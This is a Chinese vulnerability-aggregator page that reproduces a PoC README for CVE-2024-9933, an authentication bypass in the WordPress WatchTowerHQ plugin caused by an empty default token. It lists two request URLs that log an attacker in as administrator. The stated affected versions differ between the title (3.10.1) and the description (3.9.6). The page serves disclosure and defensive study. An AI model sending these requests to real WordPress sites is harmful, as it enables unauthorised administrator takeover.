POC详情: cf9d6c6145001d1a448668cd47edae6e04e4738e

来源
关联漏洞
标题: WordPress plugin WatchTowerHQ 安全漏洞 (CVE-2024-9933)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WatchTowerHQ 3.9.6版本及之前版本存在安全漏洞,该漏洞源于包含一个身份验证绕过漏洞。
描述
WatchTowerHQ <= 3.10.1 - Authentication Bypass to Administrator due to Missing Empty Value Check
介绍
# CVE-2024-9933
WatchTowerHQ &lt;= 3.10.1 - Authentication Bypass to Administrator due to Missing Empty Value Check

# Description:
The WatchTowerHQ plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.6. This is due to the 'watchtower_ota_token' default value is empty, and the not empty check is missing in the 'Password_Less_Access::login' function. This makes it possible for unauthenticated attackers to log in to the WatchTowerHQ client administrator user.


```
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
```

POC
---

```
http://kubernetes.docker.internal/?wht_login=1

OR

http://kubernetes.docker.internal/?wht_login=1&access_token=not_set
```

If vulnerable it will log you in as admin.
文件快照

[4.0K] /data/pocs/cf9d6c6145001d1a448668cd47edae6e04e4738e └── [ 779] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。